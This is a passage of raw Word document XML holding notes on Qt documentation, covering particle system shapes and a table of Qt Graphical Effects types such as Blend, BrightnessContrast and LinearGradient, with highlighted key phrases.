          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Shapes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="802"/>
      <w:bookmarkEnd w:id="803"/>
      <w:bookmarkEnd w:id="804"/>
      <w:bookmarkEnd w:id="805"/>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="008573B7" w:rsidRDefault="008573B7" w:rsidP="008573B7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The particle system contains several types which </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51DF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>represent shapes</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. These types do </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51DF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>not visualize</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> shapes, and are used for the purpose of </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51DF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>selecting a random point</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> within the shape. If you want a specific point with no randomness, use a 0 width and 0 height shape (which is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51DF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>default</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>). Otherwise you can use the shape types to specify an area, so that the result can use a random point selected from that area.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008573B7" w:rsidRPr="008573B7" w:rsidRDefault="008573B7" w:rsidP="00CD6118">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="008573B7" w:rsidRDefault="00490E7E" w:rsidP="00CD6118">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId588" w:history="1">
        <w:r w:rsidR="005A6BBD" w:rsidRPr="008573B7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://qt-project.org/doc/qt-5.1/qtgraphicaleffects/graphicaleffects.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E51DF3" w:rsidRPr="00E51DF3" w:rsidRDefault="00E51DF3" w:rsidP="00E51DF3">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="0" w:after="240" w:line="276" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="806" w:name="_Toc483000701"/>
      <w:bookmarkStart w:id="807" w:name="_Toc483003718"/>
      <w:bookmarkStart w:id="808" w:name="_Toc483604053"/>
      <w:bookmarkStart w:id="809" w:name="_Toc483605273"/>
      <w:r w:rsidRPr="005E64B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Graphical Effects</w:t>
      </w:r>
      <w:bookmarkEnd w:id="806"/>
      <w:bookmarkEnd w:id="807"/>
      <w:bookmarkEnd w:id="808"/>
      <w:bookmarkEnd w:id="809"/>
    </w:p>
    <w:p w:rsidR="00E51DF3" w:rsidRPr="00E51DF3" w:rsidRDefault="00E51DF3" w:rsidP="00E51DF3">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E51DF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Effects are </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51DF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>visual items</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51DF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that can be added to </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51DF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick user interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51DF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> as UI components. To </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51DF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51DF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the Qt Graphical Effects types, include the Qt Graphical Effects module by adding the following statement to the QML file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E51DF3" w:rsidRPr="00E51DF3" w:rsidRDefault="00E51DF3" w:rsidP="00E51DF3">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E51DF3">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51DF3">
        <w:rPr>
          <w:rStyle w:val="type"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtGraphicalEffects</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51DF3">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51DF3">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E51DF3" w:rsidRPr="00E51DF3" w:rsidRDefault="00E51DF3" w:rsidP="00E51DF3">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E51DF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">To use the effects, simply </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51DF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>add</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51DF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a specific effect declaration to the QML scene and </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51DF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>configure</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51DF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the effects properties. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51DF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>source item type</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51DF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be any QML type, even video or another effect. </w:t>
      </w:r>
      <w:r w:rsidRPr="000A30B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pipelining multiple effects together is a simple way to create even more impressive output</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51DF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E51DF3" w:rsidRPr="00E51DF3" w:rsidRDefault="00E51DF3" w:rsidP="00E51DF3">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E51DF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The following list presents the functional division of types that are part of Qt Graphical Effects:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E51DF3" w:rsidRPr="00E51DF3" w:rsidRDefault="00E51DF3" w:rsidP="00E51DF3">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="360" w:after="240"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="810" w:name="blend"/>
      <w:bookmarkStart w:id="811" w:name="_Toc483000702"/>
      <w:bookmarkStart w:id="812" w:name="_Toc483003719"/>
      <w:bookmarkStart w:id="813" w:name="_Toc483604054"/>
      <w:bookmarkStart w:id="814" w:name="_Toc483605274"/>
      <w:bookmarkEnd w:id="810"/>
      <w:r w:rsidRPr="00E51DF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Blend</w:t>
      </w:r>
      <w:bookmarkEnd w:id="811"/>
      <w:bookmarkEnd w:id="812"/>
      <w:bookmarkEnd w:id="813"/>
      <w:bookmarkEnd w:id="814"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8286"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617"/>
        <w:gridCol w:w="5669"/>
      </w:tblGrid>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589" w:history="1">
              <w:r w:rsidR="00E51DF3" w:rsidRPr="00E51DF3">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>Blend</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Merges two source items by using a blend mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E51DF3" w:rsidRPr="00E51DF3" w:rsidRDefault="00E51DF3" w:rsidP="00E51DF3">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="360" w:after="240"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="815" w:name="color"/>
      <w:bookmarkStart w:id="816" w:name="_Toc483000703"/>
      <w:bookmarkStart w:id="817" w:name="_Toc483003720"/>
      <w:bookmarkStart w:id="818" w:name="_Toc483604055"/>
      <w:bookmarkStart w:id="819" w:name="_Toc483605275"/>
      <w:bookmarkEnd w:id="815"/>
      <w:r w:rsidRPr="00E51DF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Color</w:t>
      </w:r>
      <w:bookmarkEnd w:id="816"/>
      <w:bookmarkEnd w:id="817"/>
      <w:bookmarkEnd w:id="818"/>
      <w:bookmarkEnd w:id="819"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9447"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778"/>
        <w:gridCol w:w="5669"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E51DF3" w:rsidRPr="00E51DF3"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590" w:history="1">
              <w:r w:rsidR="00E51DF3" w:rsidRPr="00E51DF3">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>BrightnessContrast</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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E51DF3">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:t>Adjusts brightness and contrast</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591" w:history="1">
              <w:r w:rsidR="00E51DF3" w:rsidRPr="00E51DF3">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>ColorOverlay</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Alters the colors of the source item by applying an overlay color</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592" w:history="1">
              <w:r w:rsidR="00E51DF3" w:rsidRPr="00E51DF3">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>Colorize</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Sets the color in the HSL color space</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593" w:history="1">
              <w:r w:rsidR="00E51DF3" w:rsidRPr="00E51DF3">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>Desaturate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Reduces the saturation of the colors</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594" w:history="1">
              <w:r w:rsidR="00E51DF3" w:rsidRPr="00E51DF3">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>GammaAdjust</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Alters the luminance of the source item</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595" w:history="1">
              <w:r w:rsidR="00E51DF3" w:rsidRPr="00E51DF3">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>HueSaturation</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Alters the source item colors in the HSL color space</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596" w:history="1">
              <w:r w:rsidR="00E51DF3" w:rsidRPr="00E51DF3">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>LevelAdjust</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Adjusts color levels in the RGBA color space</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E51DF3" w:rsidRPr="00E51DF3" w:rsidRDefault="00E51DF3" w:rsidP="00E51DF3">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="360" w:after="240"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="820" w:name="gradient"/>
      <w:bookmarkStart w:id="821" w:name="_Toc483000704"/>
      <w:bookmarkStart w:id="822" w:name="_Toc483003721"/>
      <w:bookmarkStart w:id="823" w:name="_Toc483604056"/>
      <w:bookmarkStart w:id="824" w:name="_Toc483605276"/>
      <w:bookmarkEnd w:id="820"/>
      <w:r w:rsidRPr="00E51DF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Gradient</w:t>
      </w:r>
      <w:bookmarkEnd w:id="821"/>
      <w:bookmarkEnd w:id="822"/>
      <w:bookmarkEnd w:id="823"/>
      <w:bookmarkEnd w:id="824"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9231"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6035"/>
        <w:gridCol w:w="3196"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E51DF3" w:rsidRPr="00E51DF3"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597" w:history="1">
              <w:r w:rsidR="00E51DF3" w:rsidRPr="00E51DF3">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>ConicalGradient</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3196"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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E51DF3">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:t>Draws a conical gradient</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51DF3" w:rsidRPr="00E51DF3" w:rsidTr="00E51DF3">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598" w:history="1">
              <w:r w:rsidR="00E51DF3" w:rsidRPr="00E51DF3">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>LinearGradient</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3196"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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E51DF3">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:t>Draws a linear gradient</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51DF3" w:rsidRPr="00E51DF3"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599" w:history="1">
              <w:r w:rsidR="00E51DF3" w:rsidRPr="00E51DF3">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>RadialGradient</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3196"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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E51DF3">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:t>Draws a radial gradient</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E51DF3" w:rsidRPr="00E51DF3" w:rsidRDefault="00E51DF3" w:rsidP="00E51DF3">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="360" w:after="240"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="825" w:name="distortion"/>
      <w:bookmarkStart w:id="826" w:name="_Toc483000705"/>
      <w:bookmarkStart w:id="827" w:name="_Toc483003722"/>
      <w:bookmarkStart w:id="828" w:name="_Toc483604057"/>
      <w:bookmarkStart w:id="829" w:name="_Toc483605277"/>
      <w:bookmarkEnd w:id="825"/>
      <w:r w:rsidRPr="00E51DF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Distortion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="826"/>
      <w:bookmarkEnd w:id="827"/>
      <w:bookmarkEnd w:id="828"/>
      <w:bookmarkEnd w:id="829"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="7844"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175"/>
        <w:gridCol w:w="5669"/>
      </w:tblGrid>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00" w:history="1">
              <w:r w:rsidR="00E51DF3" w:rsidRPr="005D1E34">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>Displace</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Moves the pixels of the source item according to the given displacement map</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E51DF3" w:rsidRPr="00E51DF3" w:rsidRDefault="00E51DF3" w:rsidP="00E51DF3">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="360" w:after="240"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="830" w:name="drop-shadow"/>
      <w:bookmarkStart w:id="831" w:name="_Toc483000706"/>
      <w:bookmarkStart w:id="832" w:name="_Toc483003723"/>
      <w:bookmarkStart w:id="833" w:name="_Toc483604058"/>
      <w:bookmarkStart w:id="834" w:name="_Toc483605278"/>
      <w:bookmarkEnd w:id="830"/>
      <w:r w:rsidRPr="00E51DF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
